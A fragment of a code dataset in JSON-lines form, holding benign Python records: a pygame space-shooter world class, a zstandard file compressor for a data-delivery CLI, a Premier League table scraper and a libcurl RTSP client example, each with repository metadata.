EXPLOSION_VOLUME)\n\n def set_spaceship(self, spaceship):\n if not self.spaceship is None:\n self.spaceship.kill()\n self.spaceship = spaceship\n self.all_sprites_lock.acquire()\n self.all_objects.add(spaceship, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def generate_stone(self):\n pos = pygame.math.Vector2( random.randint( 0, self.rect.width -50), 0)\n stone = Stone( pos = pos , level = random.randint(1, MAX_STONE_LEVEL) )\n if not pygame.sprite.spritecollideany(stone, self.stones):\n self.add_stone( stone )\n \n def generate_explosion(self, pos):\n global SOUND_MANAGER\n SOUND_MANAGER.play_sound( EXPLOSION_SOUND )\n explosion = Explosion()\n explosion.rect.center = pos\n self.add_explosion(explosion) \n \n def generate_dust(self, pos, level):\n if random.randint(1, int(1 / CHANCE_GREEN_DUST[level])) == 1:\n dust = GreenDust()\n else:\n dust = BlueDust()\n dust.set_pos(pygame.math.Vector2(pos))\n self.add_dust(dust)\n \n def generate_enemy_spaceship(self):\n pos = pygame.math.Vector2( random.randint( 0, self.rect.width -50), 0)\n enemy_spaceship = EnemySpaceship( pos = pos )\n if not pygame.sprite.spritecollideany(enemy_spaceship, self.enemy_spaceships):\n self.add_enemy_spaceship( enemy_spaceship )\n \n def generate_spaceship_wreckage(self, center):\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(0, 0.5)) ])\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(0, 1.5)) ]) \n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(-1, 1.5)) ])\n self.add_spaceship_wreckage([ SpaceshipWreckage( img = SPACESHIP_WRECKAGE_IMAGE, pos = center, direction = pygame.math.Vector2(1, 1.5)) ])\n \n def add_stone(self, stone):\n self.stones.add(stone, layer = STONE_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(stone, layer = STONE_LAYER)\n self.all_sprites_lock.release()\n \n def add_shot(self, shots):\n for shot in shots:\n self.shots.add(shot, layer = SHOT_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(shot, layer = SHOT_LAYER)\n self.all_sprites_lock.release()\n \n def add_explosion(self, explosion):\n self.effects.add(explosion, layer = EFFECT_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(explosion, layer = EFFECT_LAYER)\n self.all_sprites_lock.release()\n \n def add_spaceship_wreckage(self, wreckage):\n self.spaceship_wreckages.add( wreckage )\n self.all_sprites_lock.acquire()\n self.all_objects.add(wreckage, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def add_dust(self, dust):\n self.dust.add(dust, layer = DUST_LAYER)\n self.all_sprites_lock.acquire()\n self.all_objects.add(dust, layer = DUST_LAYER)\n self.all_sprites_lock.release()\n \n def add_enemy_spaceship(self, enemy_spaceship):\n self.enemy_spaceships.add(enemy_spaceship)\n self.all_sprites_lock.acquire()\n self.all_objects.add(enemy_spaceship, layer = SPACESHIP_LAYER)\n self.all_sprites_lock.release()\n \n def clear(self):\n self.all_sprites_lock.acquire()\n self.all_objects.clear(self.image, self.background)\n self.all_sprites_lock.release()\n \n def update(self, frame_time):\n old_rects = []\n for sprite in self.dust:\n sprite.follow_pos(self.spaceship.rect.center)\n self.all_sprites_lock.acquire()\n for sprite in self.all_objects.sprites():\n old_rects += sprite.update(frame_time)\n self.all_sprites_lock.release()\n if self.spaceship.rect.left < 0:\n self.spaceship.rect.left = 0\n if self.spaceship.rect.right > self.rect.width:\n self.spaceship.rect.right = self.rect.width\n \n for effect in self.effects.sprites():\n if effect.counter >= effect.max_counter:\n effect.kill()\n \n self.all_sprites_lock.acquire()\n for sprite in self.all_objects.sprites():\n if not self.rect.colliderect(sprite.rect):\n sprite.kill()\n self.all_sprites_lock.release()\n return old_rects\n \n\t# does not collide objects, if spaceship collides with stones..\n def collide_objects(self):\n for group in [self.stones, self.enemy_spaceships, self.spaceship_wreckages]:\n if pygame.sprite.spritecollide(self.spaceship, group, True):\n return self.spaceship.handle_collision()\n else:\n for group in (self.shots, self.spaceship_wreckages):\n exploding_stones = pygame.sprite.groupcollide(self.stones, group, True, True)\n for stone in exploding_stones.keys():\n self.generate_explosion(stone.rect.center)\n self.generate_dust(stone.rect.center, stone.level)\n \n for group in (self.shots, self.spaceship_wreckages):\n exploding_enemy_spaceships = pygame.sprite.groupcollide(self.enemy_spaceships, group, True, True)\n for enemy_spaceship in exploding_enemy_spaceships.keys():\n self.generate_explosion(enemy_spaceship.rect.center)\n self.generate_spaceship_wreckage(enemy_spaceship.rect.center)\n \n exploding_wreckages = pygame.sprite.groupcollide(self.spaceship_wreckages, self.shots, True, True)\n for exploding_wreckage in exploding_wreckages.keys():\n self.generate_explosion(exploding_wreckage.rect.center)\n \n collected_dust = pygame.sprite.spritecollide(self.spaceship, self.dust, True)\n for dust in collected_dust:\n self.player.collect_dust(dust)\n self.spaceship.collect_dust(dust)\n return False\n\n def draw(self, screen):\n self.all_sprites_lock.acquire()\n drawn_rects = self.all_objects.draw(self.image)\n self.all_sprites_lock.release()\n for i in range(len(drawn_rects)):\n pos = [ drawn_rects[i].left + self.rect.left , drawn_rects[i].top + self.rect.top ]\n screen.blit(self.image, pos, drawn_rects[i])\n drawn_rects[i].topleft = pos\n return drawn_rects\n\n\n# pygame.sprite.groundcollide(group1, group2, dokill1, dokill2, collided = None)\n# collided = collide_mask -> True / False\n#pygame.sprite.collide_mask(sprite1, sprite2) -> point / None\n", "repo_name": "minacode/Spaceship", "sub_path": "src/classes/World.py", "file_name": "World.py", "file_ext": "py", "file_size_in_byte": 8301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "src.classes.TexturedObject.TexturedObject", "line_number": 19, "usage_type": "name"}, {"api_name": "src.classes.TexturedObject.TexturedObject.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "src.classes.TexturedObject.TexturedObject", "line_number": 23, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.sprite.LayeredDirty", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 34, "usage_type": "attribute"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER.load_sound", "line_number": 36, "usage_type": "call"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER", "line_number": 36, "usage_type": "name"}, {"api_name": "pygame.math.Vector2", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 47, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 47, "usage_type": "call"}, {"api_name": "src.classes.Stone.Stone", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER.play_sound", "line_number": 54, "usage_type": "call"}, {"api_name": "src.classes.SoundManager.SOUND_MANAGER", "line_number": 54, "usage_type": "name"}, {"api_name": "src.classes.Explosion.Explosion", "line_number": 55, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "src.classes.GreenDust.GreenDust", "line_number": 61, "usage_type": "call"}, {"api_name": "src.classes.BlueDust.BlueDust", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 68, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 68, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "src.classes.EnemySpaceship.EnemySpaceship", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 70, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 74, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 76, "usage_type": "attribute"}, {"api_name": "src.classes.SpaceshipWreckage.SpaceshipWreckage", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.math.Vector2", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pygame.sprite.groupcollide", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "26158836584", "text": "\"\"\"\"Compressor module. Handles the compression of files.\"\"\"\n\n###############################################################################\n# IMPORTS ########################################################### IMPORTS #\n###############################################################################\n\n# Standard library\nimport dataclasses\nimport logging\nimport pathlib\nimport traceback\n\n\n# Installed\nimport zstandard as zstd\n\n# Own modules\nfrom dds_cli import FileSegment\n\n###############################################################################\n# START LOGGING CONFIG ################################# START LOGGING CONFIG #\n###############################################################################\n\nLOG = logging.getLogger(__name__)\n\n###############################################################################\n# CLASSES ########################################################### CLASSES #\n###############################################################################\n\n\nclass CompressionMagic:\n \"\"\"Compression format signatures\"\"\"\n\n BZIP2 = b\"BZh\"\n LZIP = b\"LZIP\"\n RAR4 = b\"Rar!\\x1a\\x07\\x00\"\n RAR5 = b\"Rar!\\x1a\\x07\\x01\\x00\"\n GZIP = b\"\\x1F\\x8B\"\n ZSTANDARD = b\"(\\xb5/\\xfd\"\n\n\n@dataclasses.dataclass\nclass Compressor:\n \"\"\"Handles operations relating to file compression.\"\"\"\n\n algorithm: str = \"zstandard\"\n fmt_magic: dict = dataclasses.field(init=False)\n max_magic_len: int = dataclasses.field(init=False)\n\n def __post_init__(self):\n self.fmt_magic = {\n b\"\\x913HF\": \"hap\",\n b\"`\\xea\": \"arj\",\n b\"_'\\xa8\\x89\": \"jar\",\n b\"ZOO \": \"zoo\",\n b\"PK\\x03\\x04\": \"zip\",\n b\"\\x1F\\x8B\": \"gzip\",\n b\"UFA\\xc6\\xd2\\xc1\": \"ufa\",\n b\"StuffIt \": \"sit\",\n b\"Rar!\\x1a\\x07\\x00\": \"rar v4.x\",\n b\"Rar!\\x1a\\x07\\x01\\x00\": \"rar v5\",\n b\"MAr0\\x00\": \"mar\",\n b\"DMS!\": \"dms\",\n b\"CRUSH v\": \"cru\",\n b\"BZh\": \"bz2\",\n b\"-lh\": \"lha\",\n b\"(This fi\": \"hqx\",\n b\"!\\x12\": \"ain\",\n b\"\\x1a\\x0b\": \"pak\",\n b\"(\\xb5/\\xfd\": \"zst\",\n }\n self.max_magic_len = max(len(x) for x in self.fmt_magic)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, traceb):\n if exc_type is not None:\n traceback.print_exception(exc_type, exc_val, traceb)\n return False # uncomment to pass exception through\n\n return True\n\n # Static methods ###################### Static methods #\n @staticmethod\n def compress_file(\n file: pathlib.Path,\n chunk_size: int = FileSegment.SEGMENT_SIZE_RAW,\n ) -> bytes:\n \"\"\"Compresses file by reading it chunk by chunk.\"\"\"\n\n LOG.debug(\"Started compression...\")\n\n try:\n with file.open(mode=\"rb\") as infile:\n # Initiate a Zstandard compressor\n cctzx = zstd.ZstdCompressor(write_checksum=True, level=4)\n\n # total_read = 0.0\n # Compress file chunk by chunk while reading\n with cctzx.stream_reader(infile) as compressor:\n # while True:\n # chunk = compressor.read(chunk_size)\n # LOG.debug(type(chunk))\n # if not chunk:\n # break\n # yield\n for chunk in iter(lambda: compressor.read(chunk_size), b\"\"):\n yield chunk\n except Exception as err: # pylint: disable=broad-exception-caught\n LOG.warning(str(err))\n else:\n LOG.debug(\"Compression finished.\")\n\n @staticmethod\n def decompress_filechunks(chunks, outfile: pathlib.Path, **_):\n \"\"\"Decompress file chunks\"\"\"\n\n saved, message = (False, \"\")\n\n # Decompressing file and saving\n LOG.debug(\"Decompressing...\")\n try:\n with outfile.open(mode=\"wb+\") as file:\n dctx = zstd.ZstdDecompressor()\n with dctx.stream_writer(file) as decompressor:\n for chunk in chunks:\n decompressor.write(chunk)\n\n except OSError as err:\n message = str(err)\n LOG.exception(message)\n else:\n saved = True\n LOG.debug(\"Decompression done.\")\n\n return saved, message\n\n # Public methods ###################### Public methods #\n def is_compressed(self, file):\n \"\"\"Checks if a file is compressed or not.\"\"\"\n\n compressed, error = (False, \"\")\n try:\n with file.open(mode=\"rb\") as file_obj:\n file_start = file_obj.read(self.max_magic_len)\n if file_start.startswith(tuple(x for x in self.fmt_magic)):\n compressed = True\n except OSError as err:\n error = str(err)\n\n return compressed, error\n", "repo_name": "ScilifelabDataCentre/dds_cli", "sub_path": "dds_cli/file_compressor.py", "file_name": "file_compressor.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 47, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "traceback.print_exception", "line_number": 79, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "dds_cli.FileSegment.SEGMENT_SIZE_RAW", "line_number": 88, "usage_type": "attribute"}, {"api_name": "dds_cli.FileSegment", "line_number": 88, "usage_type": "name"}, {"api_name": "zstandard.ZstdCompressor", "line_number": 97, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "zstandard.ZstdDecompressor", "line_number": 125, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "19773863472", "text": "import requests\nfrom bs4 import BeautifulSoup as soup\nimport pandas as pd\nimport csv\npage = requests.get(\"https://www.skysports.com/premier-league-table\")\nsoups = soup(page.text,'html.parser')\ntable=[]\npoints=[]\nleague_table= soups.find('table', class_='standing-table__table')\nfor team in league_table.find_all('tbody'):\n rows = team.find_all('tr')\n for row in rows:\n pl_team = row.find(class_='standing-table__cell standing-table__cell--name')\n pl_points= row.find_all('td',class_=\"standing-table__cell\")[9]\n #print(pl_points.text)\n points.append(pl_points.text)\n table.append(pl_team.text.strip())\n #print(table)\n df1= pd.DataFrame(table,points)\n print (df1)", "repo_name": "Jatin666/premierleauge", "sub_path": "league-table.py", "file_name": "league-table.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "8232480216", "text": "import sys\nimport re\nimport ctypes as ct\nfrom pathlib import Path\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n#include /* _getch() */\n\nhere = Path(__file__).resolve().parent\n\n\nOUT_DIR = here/\"output\"\nVERSION_STR = \"V1.0\"\n\n\ndef get_sdp_filepath(url: str) -> Path:\n # convert url into an sdp filename\n global OUT_DIR\n idx = url.rfind(\"/\")\n sdp_filename = (\"%s.sdp\" % url[idx + 1:]\n if idx != -1 and url[idx + 1:] else \"video.sdp\")\n return OUT_DIR/sdp_filename\n\n\n# error handling macros\n\ndef my_curl_easy_setopt(A, B, C):\n res: lcurl.CURLcode = lcurl.easy_setopt(A, B, C)\n if res != lcurl.CURLE_OK:\n print(\"libcurl.easy_setopt(%s, %s, %s) failed: %d\" %\n (A, B, C, res), file=sys.stderr)\n\ndef my_curl_easy_perform(A):\n res = lcurl.easy_perform(A)\n if res != lcurl.CURLE_OK:\n print(\"libcurl.easy_perform(%s) failed: %d\" %\n (A, res), file=sys.stderr)\n\n\n@lcurl.write_callback\ndef write_b_function(buffer, size, nitems, stream):\n file = lcurl.from_oid(stream)\n buffer_size = size * nitems\n if buffer_size == 0: return 0\n bwritten = bytes(buffer[:buffer_size])\n nwritten = file.write(bwritten)\n return nwritten\n\n\n@lcurl.write_callback\ndef write_function(buffer, size, nitems, stream):\n file = lcurl.from_oid(stream)\n buffer_size = size * nitems\n if buffer_size == 0: return 0\n bwritten = bytes(buffer[:buffer_size])\n nwritten = file.write(bwritten.decode(\"utf-8\"))\n return nwritten\n\n\ndef rtsp_options(curl: ct.POINTER(lcurl.CURL), uri: str):\n \"\"\"send RTSP OPTIONS request\"\"\"\n print(\"\\nRTSP: OPTIONS %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_OPTIONS)\n my_curl_easy_perform(curl)\n\n\ndef rtsp_describe(curl: ct.POINTER(lcurl.CURL), uri: str, sdp_filepath: Path):\n \"\"\"send RTSP DESCRIBE request and write sdp response to a file\"\"\"\n print(\"\\nRTSP: DESCRIBE %s\" % uri)\n try:\n sdp_fp = sdp_filepath.open(\"wb\")\n except:\n print(\"Could not open '%s' for writing\" % sdp_filepath,\n file=sys.stderr)\n sdp_fp = sys.stdout\n else:\n print(\"Writing SDP to '%s'\" % sdp_filepath)\n try:\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_b_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, id(sdp_fp))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_DESCRIBE)\n my_curl_easy_perform(curl)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, id(sys.stdout))\n finally:\n if sdp_fp is not sys.stdout:\n sdp_fp.close()\n\n\ndef rtsp_setup(curl: ct.POINTER(lcurl.CURL), uri: str, transport: str):\n \"\"\"send RTSP SETUP request\"\"\"\n print(\"\\nRTSP: SETUP %s\" % uri)\n print(\" TRANSPORT %s\" % transport)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_TRANSPORT,\n transport.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_SETUP)\n my_curl_easy_perform(curl)\n\n\ndef rtsp_play(curl: ct.POINTER(lcurl.CURL), uri: str, transfer_range: str):\n \"\"\"send RTSP PLAY request\"\"\"\n print(\"\\nRTSP: PLAY %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_STREAM_URI,\n uri.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RANGE,\n transfer_range.encode(\"utf-8\"))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_PLAY)\n my_curl_easy_perform(curl)\n # switch off using range again\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RANGE, None)\n\n\ndef rtsp_teardown(curl: ct.POINTER(lcurl.CURL), uri: str):\n \"\"\"send RTSP TEARDOWN request\"\"\"\n print(\"\\nRTSP: TEARDOWN %s\" % uri)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_RTSP_REQUEST,\n lcurl.CURL_RTSPREQ_TEARDOWN)\n my_curl_easy_perform(curl)\n\n\ndef get_media_control_attribute(sdp_filepath: Path) -> str:\n # scan sdp file for media control attribute\n try:\n sdp_fp = sdp_filepath.open(\"rb\")\n except:\n return \"\"\n control = \"\"\n with sdp_fp:\n max_len = 256\n while True:\n chunk = sdp_fp.read(max_len)\n if not chunk: break\n match = re.match(chunk, rb\" a = control: (\\S+)\")\n if match:\n control = match.group(1)\n return control\n\n\ndef main(argv=sys.argv[1:]):\n app_name = sys.argv[0].rpartition(\"/\")[2].rpartition(\"\\\\\")[2]\n global VERSION_STR\n\n if 1:\n # UDP\n transport = \"RTP/AVP;unicast;client_port=1234-1235\"\n else:\n # TCP\n transport = \"RTP/AVP/TCP;unicast;client_port=1234-1235\"\n transfer_range = \"0.000-\"\n\n print(\"\\nRTSP request %s\" % VERSION_STR)\n print(\" Project website: %s\" %\n \"https://github.com/BackupGGCode/rtsprequest\")\n print(\" Requires curl V7.20 or greater\\n\")\n\n # check command line\n if not (1 <= len(argv) <= 2):\n print(\"Usage: %s url [transport]\\n\" % app_name)\n print(\" url of video server\")\n print(\" transport (optional) specifier for media stream protocol\")\n print(\" default transport: %s\" % transport)\n print(\"Example: %s rtsp://192.168.0.2/media/video1\\n\" % app_name)\n\n return 1\n\n url: str = argv[0]\n if len(argv) >= 2: transport = argv[1]\n # lcurl.CURLcode res\n sdp_filepath: Path = get_sdp_filepath(url)\n\n # initialize curl\n res = lcurl.global_init(lcurl.CURL_GLOBAL_ALL)\n # initialize this curl session\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(True, curl):\n if res != lcurl.CURLE_OK:\n print(\"curl_global_init(%s) failed: %d\" %\n (\"CURL_GLOBAL_ALL\", res), file=sys.stderr)\n return 1\n if not curl:\n print(\"curl_easy_init() failed\", file=sys.stderr)\n return 1\n\n ver = lcurl.version_info(lcurl.CURLVERSION_NOW).contents\n print(\" curl V%s loaded\" % ver.version, file=sys.stderr)\n\n my_curl_easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 0)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_NOPROGRESS, 1)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_HEADERFUNCTION, write_function)\n my_curl_easy_setopt(curl, lcurl.CURLOPT_HEADERDATA, id(sys.stdout))\n my_curl_easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n\n # request server options\n uri = \"%s\" % url\n rtsp_options(curl, uri)\n\n # request session description and write response to sdp file\n rtsp_describe(curl, uri, sdp_filepath)\n\n # get media control attribute from sdp file\n control = get_media_control_attribute(sdp_filepath)\n\n # setup media stream\n uri = \"%s/%s\" % (url, control)\n rtsp_setup(curl, uri, transport)\n\n # start playing media stream\n uri = \"%s/\" % url\n rtsp_play(curl, uri, transfer_range)\n input(\"Playing video, press any key to stop ...\")\n print()\n\n # teardown session\n rtsp_teardown(curl, uri)\n\n return 0\n\n\nsys.exit(main())\n", "repo_name": "karpierz/libcurl", "sub_path": "examples/rtsp.py", "file_name": "rtsp.py", "file_ext": "py", "file_size_in_byte": 7559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "libcurl.CURLcode", "line_number": 29, "usage_type": "attribute"}, {"api_name": "libcurl.easy_setopt", "line_number": 29, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "libcurl.easy_perform", "line_number": 35, "usage_type": "call"}, {"api_name": "libcurl.CURLE_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 38, "usage_type": "attribute"}, {"api_name": "libcurl.from_oid", "line_number": 43, "usage_type": "call"}, {"api_name": "libcurl.write_callback", "line_number": 41, "usage_type": "attribute"}, {"api_name": "libcurl.from_oid", "line_number": 53, "usage_type": "call"}, {"api_name": "libcurl.write_callback", "line_number": 51, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 61, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 61, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 64, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 66, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_OPTIONS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 71, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 79, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEFUNCTION", "line_number": 83, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEDATA", "line_number": 84, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 85, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_DESCRIBE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEFUNCTION", "line_number": 88, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_WRITEDATA", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 95, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 99, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_TRANSPORT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 103, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_SETUP", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 108, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 108, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_STREAM_URI", "line_number": 111, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RANGE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 115, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_PLAY", "line_number": 116, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RANGE", "line_number": 119, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 122, "usage_type": "call"}, {"api_name": "libcurl.CURL", "line_number": 122, "usage_type": "attribute"}, {"api_name": "libcurl.CURLOPT_RTSP_REQUEST", "line_number": 125, "usage_type": "attribute"}, {"api_name": "libcurl.CURL_RTSPREQ_TEARDOWN", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "name"}, {"api_name": "re.match", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 178, "usage_type": "name"}, {"api_name": "libcurl.global_init", "line_number": 181, "usage_type": "call"}, {"api_name": "libcurl.CURL_GLOBAL_ALL", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ctypes.POINTER", "line_number": 